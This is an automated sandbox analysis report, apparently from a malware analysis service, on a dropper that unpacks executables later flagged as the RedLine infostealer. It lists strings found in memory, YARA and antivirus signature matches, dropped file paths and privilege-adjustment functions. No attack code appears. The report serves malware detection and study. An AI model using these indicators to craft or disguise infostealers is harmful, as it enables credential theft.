                          Source: bvr38xq.exe, 00000004.00000002.398193743.0000000003111000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/TerminateSequence
                          Source: bvr38xq.exe, 00000004.00000002.398193743.000000000319F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc
                          Source: bvr38xq.exe, 00000004.00000002.398193743.000000000319F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/dk
                          Source: bvr38xq.exe, 00000004.00000002.398193743.000000000319F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/dk/p_sha1
                          Source: bvr38xq.exe, 00000004.00000002.398193743.000000000319F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/sct
                          Source: bvr38xq.exe, 00000004.00000002.398193743.000000000319F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust
                          Source: bvr38xq.exe, 00000004.00000002.398193743.000000000319F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust#BinarySecret
                          Source: bvr38xq.exe, 00000004.00000002.398193743.000000000319F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/CK/PSHA1
                          Source: bvr38xq.exe, 00000004.00000002.398193743.000000000319F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Cancel
                          Source: bvr38xq.exe, 00000004.00000002.398193743.000000000319F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Issue
                          Source: bvr38xq.exe, 00000004.00000002.398193743.000000000319F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Nonce
                          Source: bvr38xq.exe, 00000004.00000002.398193743.000000000319F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/PublicKey
                          Source: bvr38xq.exe, 00000004.00000002.398193743.000000000319F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/Issue
                          Source: bvr38xq.exe, 00000004.00000002.398193743.000000000319F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT
                          Source: bvr38xq.exe, 00000004.00000002.398193743.000000000319F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT/Cancel
                          Source: bvr38xq.exe, 00000004.00000002.398193743.000000000319F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT/Renew
                          Source: bvr38xq.exe, 00000004.00000002.398193743.000000000319F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/Issue
                          Source: bvr38xq.exe, 00000004.00000002.398193743.000000000319F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT
                          Source: bvr38xq.exe, 00000004.00000002.398193743.000000000319F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Cancel
                          Source: bvr38xq.exe, 00000004.00000002.398193743.000000000319F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Renew
                          Source: bvr38xq.exe, 00000004.00000002.398193743.000000000319F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Renew
                          Source: bvr38xq.exe, 00000004.00000002.398193743.000000000319F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/SymmetricKey
                          Source: bvr38xq.exe, 00000004.00000002.398193743.000000000319F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/spnego
                          Source: bvr38xq.exe, 00000004.00000002.398193743.000000000319F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/tlsnego
                          Source: bvr38xq.exe, 00000004.00000002.398193743.0000000003111000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dns
                          Source: bvr38xq.exe, 00000004.00000002.398193743.000000000319F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                          Source: bvr38xq.exe, 00000004.00000002.398193743.0000000003111000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/right/possessproperty
                          Source: bvr38xq.exe, 00000004.00000002.398193743.000000000319F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2006/02/addressingidentity
                          Source: bvr38xq.exe, 00000004.00000002.398193743.000000000319F000.00000004.00000800.00020000.00000000.sdmp, bvr38xq.exe, 00000004.00000002.398193743.0000000003111000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/
                          Source: bvr38xq.exe, 00000004.00000002.398193743.0000000003111000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id1
                          Source: bvr38xq.exe, 00000004.00000002.398193743.0000000003111000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id10
                          Source: bvr38xq.exe, 00000004.00000002.398193743.0000000003111000.00000004.00000800.00020000.00000000.sdmp, bvr38xq.exe, 00000004.00000002.398193743.0000000003466000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id10Response
                          Source: bvr38xq.exe, 00000004.00000002.398193743.0000000003111000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id11
                          Source: bvr38xq.exe, 00000004.00000002.398193743.0000000003111000.00000004.00000800.00020000.00000000.sdmp, bvr38xq.exe, 00000004.00000002.398193743.0000000003466000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id11Response
                          Source: bvr38xq.exe, 00000004.00000002.398193743.0000000003111000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id12
                          Source: bvr38xq.exe, 00000004.00000002.398193743.0000000003111000.00000004.00000800.00020000.00000000.sdmp, bvr38xq.exe, 00000004.00000002.398193743.0000000003466000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id12Response
                          Source: bvr38xq.exe, 00000004.00000002.398193743.000000000319F000.00000004.00000800.00020000.00000000.sdmp, bvr38xq.exe, 00000004.00000002.398193743.0000000003111000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id13
                          Source: bvr38xq.exe, 00000004.00000002.398193743.0000000003111000.00000004.00000800.00020000.00000000.sdmp, bvr38xq.exe, 00000004.00000002.398193743.0000000003466000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id13Response
                          Source: bvr38xq.exe, 00000004.00000002.398193743.0000000003111000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id14
                          Source: bvr38xq.exe, 00000004.00000002.398193743.0000000003111000.00000004.00000800.00020000.00000000.sdmp, bvr38xq.exe, 00000004.00000002.398193743.0000000003466000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id14Response
                          Source: bvr38xq.exe, 00000004.00000002.398193743.0000000003111000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id15
                          Source: bvr38xq.exe, 00000004.00000002.398193743.000000000319F000.00000004.00000800.00020000.00000000.sdmp, bvr38xq.exe, 00000004.00000002.398193743.0000000003111000.00000004.00000800.00020000.00000000.sdmp, bvr38xq.exe, 00000004.00000002.398193743.000000000355E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id15Response
                          Source: bvr38xq.exe, 00000004.00000002.398193743.0000000003111000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id16
                          Source: bvr38xq.exe, 00000004.00000002.398193743.0000000003111000.00000004.00000800.00020000.00000000.sdmp, bvr38xq.exe, 00000004.00000002.398193743.0000000003466000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id16Response
                          Source: bvr38xq.exe, 00000004.00000002.398193743.0000000003111000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id17
                          Source: bvr38xq.exe, 00000004.00000002.398193743.0000000003111000.00000004.00000800.00020000.00000000.sdmp, bvr38xq.exe, 00000004.00000002.398193743.0000000003466000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id17Response
                          Source: bvr38xq.exe, 00000004.00000002.398193743.0000000003111000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id18
                          Source: bvr38xq.exe, 00000004.00000002.398193743.0000000003111000.00000004.00000800.00020000.00000000.sdmp, bvr38xq.exe, 00000004.00000002.398193743.0000000003466000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id18Response
                          Source: bvr38xq.exe, 00000004.00000002.398193743.0000000003111000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id19
                          Source: bvr38xq.exe, 00000004.00000002.398193743.0000000003111000.00000004.00000800.00020000.00000000.sdmp, bvr38xq.exe, 00000004.00000002.398193743.0000000003466000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id19Response
                          Source: bvr38xq.exe, 00000004.00000002.398193743.000000000319F000.00000004.00000800.00020000.00000000.sdmp, bvr38xq.exe, 00000004.00000002.398193743.0000000003111000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id1Response
                          Source: bvr38xq.exe, 00000004.00000002.398193743.0000000003111000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id2
                          Source: bvr38xq.exe, 00000004.00000002.398193743.0000000003111000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id20
                          Source: bvr38xq.exe, 00000004.00000002.398193743.0000000003111000.00000004.00000800.00020000.00000000.sdmp, bvr38xq.exe, 00000004.00000002.398193743.0000000003466000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id20Response
                          Source: bvr38xq.exe, 00000004.00000002.398193743.0000000003111000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id21
                          Source: bvr38xq.exe, 00000004.00000002.398193743.000000000355E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id21Response
                          Source: bvr38xq.exe, 00000004.00000002.398193743.0000000003111000.00000004.00000800.00020000.00000000.sdmp, bvr38xq.exe, 00000004.00000002.398193743.0000000003466000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id22
                          Source: bvr38xq.exe, 00000004.00000002.398193743.000000000319F000.00000004.00000800.00020000.00000000.sdmp, bvr38xq.exe, 00000004.00000002.398193743.0000000003111000.00000004.00000800.00020000.00000000.sdmp, bvr38xq.exe, 00000004.00000002.398193743.000000000355E000.00000004.00000800.00020000.00000000.sdmp, bvr38xq.exe, 00000004.00000002.398193743.0000000003466000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id22Response
                          Source: bvr38xq.exe, 00000004.00000002.398193743.000000000319F000.00000004.00000800.00020000.00000000.sdmp, bvr38xq.exe, 00000004.00000002.398193743.0000000003111000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id2Response
                          Source: bvr38xq.exe, 00000004.00000002.398193743.0000000003111000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id3
                          Source: bvr38xq.exe, 00000004.00000002.398193743.0000000003111000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id3Response
                          Source: bvr38xq.exe, 00000004.00000002.398193743.0000000003111000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id4
                          Source: bvr38xq.exe, 00000004.00000002.398193743.000000000319F000.00000004.00000800.00020000.00000000.sdmp, bvr38xq.exe, 00000004.00000002.398193743.0000000003111000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id4Response
                          Source: bvr38xq.exe, 00000004.00000002.398193743.0000000003111000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id5
                          Source: bvr38xq.exe, 00000004.00000002.398193743.0000000003111000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id5Response
                          Source: bvr38xq.exe, 00000004.00000002.398193743.0000000003111000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id6
                          Source: bvr38xq.exe, 00000004.00000002.398193743.0000000003111000.00000004.00000800.00020000.00000000.sdmp, bvr38xq.exe, 00000004.00000002.398193743.0000000003466000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id6Response
                          Source: bvr38xq.exe, 00000004.00000002.398193743.0000000003111000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id7
                          Source: bvr38xq.exe, 00000004.00000002.398193743.0000000003111000.00000004.00000800.00020000.00000000.sdmp, bvr38xq.exe, 00000004.00000002.398193743.0000000003466000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id7Response
                          Source: bvr38xq.exe, 00000004.00000002.398193743.0000000003111000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id8
                          Source: bvr38xq.exe, 00000004.00000002.398193743.0000000003111000.00000004.00000800.00020000.00000000.sdmp, bvr38xq.exe, 00000004.00000002.398193743.0000000003466000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id8Response
                          Source: bvr38xq.exe, 00000004.00000002.398193743.0000000003111000.00000004.00000800.00020000.00000000.sdmp, bvr38xq.exe, 00000004.00000002.398193743.0000000003466000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id9
                          Source: bvr38xq.exe, 00000004.00000002.398193743.000000000319F000.00000004.00000800.00020000.00000000.sdmp, bvr38xq.exe, 00000004.00000002.398193743.0000000003111000.00000004.00000800.00020000.00000000.sdmp, bvr38xq.exe, 00000004.00000002.398193743.0000000003466000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id9Response
                          Source: bvr38xq.exe, 00000004.00000002.401601537.000000000418C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                          Source: faC80kI.exe, 00000002.00000003.306466167.000000000442E000.00000004.00000020.00020000.00000000.sdmp, bvr38xq.exe, 00000004.00000002.398193743.000000000319F000.00000004.00000800.00020000.00000000.sdmp, bvr38xq.exe, 00000004.00000000.331124097.0000000000D72000.00000002.00000001.01000000.00000009.sdmp, bvr38xq.exe.2.drString found in binary or memory: https://api.ip.sb/ip
                          Source: bvr38xq.exe, 00000004.00000002.401601537.000000000418C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                          Source: bvr38xq.exe, 00000004.00000002.401601537.000000000418C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                          Source: bvr38xq.exe, 00000004.00000002.401601537.000000000416F000.00000004.00000800.00020000.00000000.sdmp, bvr38xq.exe, 00000004.00000002.401601537.000000000420A000.00000004.00000800.00020000.00000000.sdmp, bvr38xq.exe, 00000004.00000002.401601537.00000000043F1000.00000004.00000800.00020000.00000000.sdmp, bvr38xq.exe, 00000004.00000002.401601537.0000000004288000.00000004.00000800.00020000.00000000.sdmp, bvr38xq.exe, 00000004.00000002.398193743.00000000032B4000.00000004.00000800.00020000.00000000.sdmp, bvr38xq.exe, 00000004.00000002.401601537.00000000041ED000.00000004.00000800.00020000.00000000.sdmp, bvr38xq.exe, 00000004.00000002.398193743.0000000003228000.00000004.00000800.00020000.00000000.sdmp, bvr38xq.exe, 00000004.00000002.398193743.0000000003459000.00000004.00000800.00020000.00000000.sdmp, bvr38xq.exe, 00000004.00000002.401601537.00000000042E9000.00000004.00000800.00020000.00000000.sdmp, bvr38xq.exe, 00000004.00000002.401601537.0000000004383000.00000004.00000800.00020000.00000000.sdmp, bvr38xq.exe, 00000004.00000002.401601537.0000000004306000.00000004.00000800.00020000.00000000.sdmp, bvr38xq.exe, 00000004.00000002.401601537.000000000426B000.00000004.00000800.00020000.00000000.sdmp, bvr38xq.exe, 00000004.00000002.398193743.0000000003340000.00000004.00000800.00020000.00000000.sdmp, bvr38xq.exe, 00000004.00000002.398193743.00000000033CC000.00000004.00000800.00020000.00000000.sdmp, bvr38xq.exe, 00000004.00000002.401601537.0000000004366000.00000004.00000800.00020000.00000000.sdmp, bvr38xq.exe, 00000004.00000002.401601537.000000000418C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                          Source: bvr38xq.exe, 00000004.00000002.401601537.000000000418C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                          Source: bvr38xq.exe, 00000004.00000002.401601537.000000000416F000.00000004.00000800.00020000.00000000.sdmp, bvr38xq.exe, 00000004.00000002.401601537.000000000420A000.00000004.00000800.00020000.00000000.sdmp, bvr38xq.exe, 00000004.00000002.401601537.00000000043F1000.00000004.00000800.00020000.00000000.sdmp, bvr38xq.exe, 00000004.00000002.401601537.0000000004288000.00000004.00000800.00020000.00000000.sdmp, bvr38xq.exe, 00000004.00000002.398193743.00000000032B4000.00000004.00000800.00020000.00000000.sdmp, bvr38xq.exe, 00000004.00000002.401601537.00000000041ED000.00000004.00000800.00020000.00000000.sdmp, bvr38xq.exe, 00000004.00000002.398193743.0000000003228000.00000004.00000800.00020000.00000000.sdmp, bvr38xq.exe, 00000004.00000002.398193743.0000000003459000.00000004.00000800.00020000.00000000.sdmp, bvr38xq.exe, 00000004.00000002.401601537.00000000042E9000.00000004.00000800.00020000.00000000.sdmp, bvr38xq.exe, 00000004.00000002.401601537.0000000004383000.00000004.00000800.00020000.00000000.sdmp, bvr38xq.exe, 00000004.00000002.401601537.0000000004306000.00000004.00000800.00020000.00000000.sdmp, bvr38xq.exe, 00000004.00000002.401601537.000000000426B000.00000004.00000800.00020000.00000000.sdmp, bvr38xq.exe, 00000004.00000002.398193743.0000000003340000.00000004.00000800.00020000.00000000.sdmp, bvr38xq.exe, 00000004.00000002.398193743.00000000033CC000.00000004.00000800.00020000.00000000.sdmp, bvr38xq.exe, 00000004.00000002.401601537.0000000004366000.00000004.00000800.00020000.00000000.sdmp, bvr38xq.exe, 00000004.00000002.401601537.000000000418C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
                          Source: bvr38xq.exe, 00000004.00000002.401601537.000000000416F000.00000004.00000800.00020000.00000000.sdmp, bvr38xq.exe, 00000004.00000002.401601537.000000000420A000.00000004.00000800.00020000.00000000.sdmp, bvr38xq.exe, 00000004.00000002.401601537.00000000043F1000.00000004.00000800.00020000.00000000.sdmp, bvr38xq.exe, 00000004.00000002.401601537.0000000004288000.00000004.00000800.00020000.00000000.sdmp, bvr38xq.exe, 00000004.00000002.398193743.00000000032B4000.00000004.00000800.00020000.00000000.sdmp, bvr38xq.exe, 00000004.00000002.401601537.00000000041ED000.00000004.00000800.00020000.00000000.sdmp, bvr38xq.exe, 00000004.00000002.398193743.0000000003228000.00000004.00000800.00020000.00000000.sdmp, bvr38xq.exe, 00000004.00000002.398193743.0000000003459000.00000004.00000800.00020000.00000000.sdmp, bvr38xq.exe, 00000004.00000002.401601537.00000000042E9000.00000004.00000800.00020000.00000000.sdmp, bvr38xq.exe, 00000004.00000002.401601537.0000000004383000.00000004.00000800.00020000.00000000.sdmp, bvr38xq.exe, 00000004.00000002.401601537.0000000004306000.00000004.00000800.00020000.00000000.sdmp, bvr38xq.exe, 00000004.00000002.401601537.000000000426B000.00000004.00000800.00020000.00000000.sdmp, bvr38xq.exe, 00000004.00000002.398193743.0000000003340000.00000004.00000800.00020000.00000000.sdmp, bvr38xq.exe, 00000004.00000002.398193743.00000000033CC000.00000004.00000800.00020000.00000000.sdmp, bvr38xq.exe, 00000004.00000002.401601537.0000000004366000.00000004.00000800.00020000.00000000.sdmp, bvr38xq.exe, 00000004.00000002.401601537.000000000418C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas_sfp&command=
                          Source: bvr38xq.exe, 00000004.00000002.401601537.000000000420A000.00000004.00000800.00020000.00000000.sdmp, bvr38xq.exe, 00000004.00000002.401601537.00000000043F1000.00000004.00000800.00020000.00000000.sdmp, bvr38xq.exe, 00000004.00000002.401601537.0000000004288000.00000004.00000800.00020000.00000000.sdmp, bvr38xq.exe, 00000004.00000002.401601537.0000000004383000.00000004.00000800.00020000.00000000.sdmp, bvr38xq.exe, 00000004.00000002.401601537.0000000004306000.00000004.00000800.00020000.00000000.sdmp, bvr38xq.exe, 00000004.00000002.401601537.000000000418C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://search.yahoo.com?fr=crmas_sfp
                          Source: bvr38xq.exe, 00000004.00000002.401601537.000000000416F000.00000004.00000800.00020000.00000000.sdmp, bvr38xq.exe, 00000004.00000002.401601537.000000000420A000.00000004.00000800.00020000.00000000.sdmp, bvr38xq.exe, 00000004.00000002.401601537.00000000043F1000.00000004.00000800.00020000.00000000.sdmp, bvr38xq.exe, 00000004.00000002.401601537.0000000004288000.00000004.00000800.00020000.00000000.sdmp, bvr38xq.exe, 00000004.00000002.398193743.00000000032B4000.00000004.00000800.00020000.00000000.sdmp, bvr38xq.exe, 00000004.00000002.401601537.00000000041ED000.00000004.00000800.00020000.00000000.sdmp, bvr38xq.exe, 00000004.00000002.398193743.0000000003228000.00000004.00000800.00020000.00000000.sdmp, bvr38xq.exe, 00000004.00000002.398193743.0000000003459000.00000004.00000800.00020000.00000000.sdmp, bvr38xq.exe, 00000004.00000002.401601537.00000000042E9000.00000004.00000800.00020000.00000000.sdmp, bvr38xq.exe, 00000004.00000002.401601537.0000000004383000.00000004.00000800.00020000.00000000.sdmp, bvr38xq.exe, 00000004.00000002.401601537.0000000004306000.00000004.00000800.00020000.00000000.sdmp, bvr38xq.exe, 00000004.00000002.401601537.000000000426B000.00000004.00000800.00020000.00000000.sdmp, bvr38xq.exe, 00000004.00000002.398193743.0000000003340000.00000004.00000800.00020000.00000000.sdmp, bvr38xq.exe, 00000004.00000002.398193743.00000000033CC000.00000004.00000800.00020000.00000000.sdmp, bvr38xq.exe, 00000004.00000002.401601537.0000000004366000.00000004.00000800.00020000.00000000.sdmp, bvr38xq.exe, 00000004.00000002.401601537.000000000418C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://search.yahoo.com?fr=crmas_sfpf
                          Source: bvr38xq.exe, 00000004.00000002.401601537.000000000416F000.00000004.00000800.00020000.00000000.sdmp, bvr38xq.exe, 00000004.00000002.401601537.000000000420A000.00000004.00000800.00020000.00000000.sdmp, bvr38xq.exe, 00000004.00000002.401601537.00000000043F1000.00000004.00000800.00020000.00000000.sdmp, bvr38xq.exe, 00000004.00000002.401601537.0000000004288000.00000004.00000800.00020000.00000000.sdmp, bvr38xq.exe, 00000004.00000002.398193743.00000000032B4000.00000004.00000800.00020000.00000000.sdmp, bvr38xq.exe, 00000004.00000002.401601537.00000000041ED000.00000004.00000800.00020000.00000000.sdmp, bvr38xq.exe, 00000004.00000002.398193743.0000000003228000.00000004.00000800.00020000.00000000.sdmp, bvr38xq.exe, 00000004.00000002.398193743.0000000003459000.00000004.00000800.00020000.00000000.sdmp, bvr38xq.exe, 00000004.00000002.401601537.00000000042E9000.00000004.00000800.00020000.00000000.sdmp, bvr38xq.exe, 00000004.00000002.401601537.0000000004383000.00000004.00000800.00020000.00000000.sdmp, bvr38xq.exe, 00000004.00000002.401601537.0000000004306000.00000004.00000800.00020000.00000000.sdmp, bvr38xq.exe, 00000004.00000002.401601537.000000000426B000.00000004.00000800.00020000.00000000.sdmp, bvr38xq.exe, 00000004.00000002.398193743.0000000003340000.00000004.00000800.00020000.00000000.sdmp, bvr38xq.exe, 00000004.00000002.398193743.00000000033CC000.00000004.00000800.00020000.00000000.sdmp, bvr38xq.exe, 00000004.00000002.401601537.0000000004366000.00000004.00000800.00020000.00000000.sdmp, bvr38xq.exe, 00000004.00000002.401601537.000000000418C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico

                          System Summary

                          barindex
                          Source: 4.0.bvr38xq.exe.d70000.0.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                          Source: 2.3.faC80kI.exe.4430c20.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                          Source: 2.3.faC80kI.exe.4430c20.0.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\bvr38xq.exe, type: DROPPEDMatched rule: Detects RedLine infostealer Author: ditekSHen
                          Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                          Source: 4.0.bvr38xq.exe.d70000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                          Source: 2.3.faC80kI.exe.4430c20.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                          Source: 2.3.faC80kI.exe.4430c20.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\bvr38xq.exe, type: DROPPEDMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008D1F90 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,ExitWindowsEx,ExitWindowsEx,0_2_008D1F90
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\fxV11fe.exeCode function: 1_2_00A01F90 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,ExitWindowsEx,ExitWindowsEx,1_2_00A01F90
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\faC80kI.exeCode function: 2_2_00A91F90 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,ExitWindowsEx,ExitWindowsEx,2_2_00A91F90
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008D3BA20_2_008D3BA2
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008D5C9E0_2_008D5C9E
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\fxV11fe.exeCode function: 1_2_00A03BA21_2_00A03BA2
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\fxV11fe.exeCode function: 1_2_00A05C9E1_2_00A05C9E
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\faC80kI.exeCode function: 2_2_00A93BA22_2_00A93BA2
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\faC80kI.exeCode function: 2_2_00A95C9E2_2_00A95C9E
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\bvr38xq.exeCode function: 4_2_0162F7C84_2_0162F7C8
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\bvr38xq.exeCode function: 4_2_0162F4084_2_0162F408
                          Source: file.exeStatic PE information: Resource name: RT_RCDATA type: Microsoft Cabinet archive data, many, 645130 bytes, 2 files, at 0x2c +A "fxV11fe.exe" +A "doa18JW.exe", ID 1919, number 1, 27 datablocks, 0x1503 compression
